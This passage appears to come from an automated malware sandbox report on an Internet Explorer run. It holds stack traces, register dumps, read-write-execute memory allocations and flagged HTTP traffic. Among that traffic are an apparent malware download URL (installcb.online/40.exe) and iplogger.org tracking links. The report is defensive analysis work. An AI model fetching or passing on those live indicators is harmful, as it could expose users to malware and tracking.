0x755777c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7557788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x768ea48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x768e853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x768ea4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x768fcd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x768fd87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7566b727 registers.esp: 103477428 registers.edi: 4255300 registers.eax: 103477428 registers.ebp: 103477508 registers.edx: 131 registers.ebx: 103477792 registers.esi: 2147746133 registers.ecx: 4234592	1
__exception__ Sept. 19, 2021, 10:44 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7533374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x76a0f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x7534414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x768dfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x76a0a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x76fbe99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x76f972ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x76f8ab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x76f8ea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x76f887f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x76f8ba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755762fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75576d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755777c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x75577bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x76fb516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x76fb50ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x76f8a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76f89b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76f89aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x76fb530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x76fb57a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x6b55540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x6b5552ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x6b630ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77b47e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x77b254f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7566b727 registers.esp: 62184848 registers.edi: 1989278224 registers.eax: 62184848 registers.ebp: 62184928 registers.edx: 1 registers.ebx: 3938820 registers.esi: 2147746133 registers.ecx: 3675731139	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header				suspicious_request	GET https://api.ip.sb/geoip
suspicious_features	GET method with no useragent header				suspicious_request	GET https://installcb.online/40.exe

Performs some HTTP requests (6 events)

request	GET http://secure.globalsign.com/cacert/root-r3.crt
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET https://api.ip.sb/geoip
request	GET https://installcb.online/40.exe
request	GET https://iplogger.org/1hEue7
request	GET https://iplogger.org/favicon.ico

Allocates read-write-execute memory (usually to unpack itself) (50 out of 778 events)

Time & API	Arguments	Status
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a44000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75671000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a44000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a44000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75671000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a44000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a45000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a45000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7566b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a5c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7566b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7566b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a63000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a68000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76abe000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a65000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a5c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a43000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7566c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7566d000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a44000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a5c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75674000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a5a000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x770d3000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75671000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a44000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7566b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7566b000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76abf000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a44000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75678000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75678000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a6c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75678000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a45000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75678000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a45000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a43000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7566c000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a44000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75670000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a41000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x75671000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 19, 2021, 10:42 a.m.	process_identifier: 1772 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x76a43000 process_handle: 0xffffffff	1

An application raised an exception which may be indicative of an exploit crash (3 events)

Time & API	Arguments	Status	Return	Repeated
Application Crash	Process iexplore.exe with pid 1580 crashed
__exception__ Sept. 19, 2021, 10:44 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7533374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x76934387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x7532ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75326a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75326b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75326a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75345c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x753c06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x76a0d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x76a0d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x76a0ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x76928a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x76928938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7692950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x76a0dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x76a0db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x76a0e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x76929367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x76929326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755762fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75576d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755777c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7557788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x768ea48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x768e853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x768ea4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x768fcd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x768fd87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7566b727 registers.esp: 103477428 registers.edi: 4255300 registers.eax: 103477428 registers.ebp: 103477508 registers.edx: 131 registers.ebx: 103477792 registers.esi: 2147746133 registers.ecx: 4234592	1	0	0
__exception__ Sept. 19, 2021, 10:44 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7533374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x76a0f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x7534414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x768dfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x76a0a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x76fbe99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x76f972ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x76f8ab0d GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x76f8ea98 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x76f887f7 CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x76f8ba32 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755762fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75576d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755777c4 DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x75577bca CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x76fb516f CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x76fb50ce RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x76f8a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76f89b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76f89aa8 CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x76fb530c URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x76fb57a0 DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x6b55540c DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x6b5552ca CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x6b630ea3 RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x77b47e96 TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x77b254f4 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7566b727 registers.esp: 62184848 registers.edi: 1989278224 registers.eax: 62184848 registers.ebp: 62184928 registers.edx: 1 registers.ebx: 3938820 registers.esi: 2147746133 registers.ecx: 3675731139	1	0	0

Application Crash

Process iexplore.exe with pid 1580 crashed

Time & API

Arguments

Status

Return

Repeated

__exception__

Sept. 19, 2021, 10:44 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7533374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x76934387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x7532ef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75326a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75326b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75326a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75345c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x753c06b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x76a0d7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x76a0d876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x76a0ddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x76928a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x76928938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7692950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x76a0dccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x76a0db41
